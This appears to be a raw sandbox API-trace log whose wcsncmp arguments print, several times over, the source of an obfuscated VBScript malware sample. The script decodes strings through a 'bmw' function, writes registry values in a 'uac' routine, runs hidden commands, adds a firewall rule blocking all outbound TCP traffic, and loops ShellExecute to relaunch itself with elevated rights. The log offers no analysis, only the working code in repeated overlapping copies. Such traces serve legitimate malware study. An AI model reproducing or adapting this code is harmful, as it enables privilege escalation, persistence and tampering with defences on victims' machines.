bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.031] wcsncmp (_String1="PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0223.031] wcsncmp (_String1="ROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0223.031] wcsncmp (_String1="OTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0223.031] wcsncmp (_String1="TOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0223.031] wcsncmp (_String1="OCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 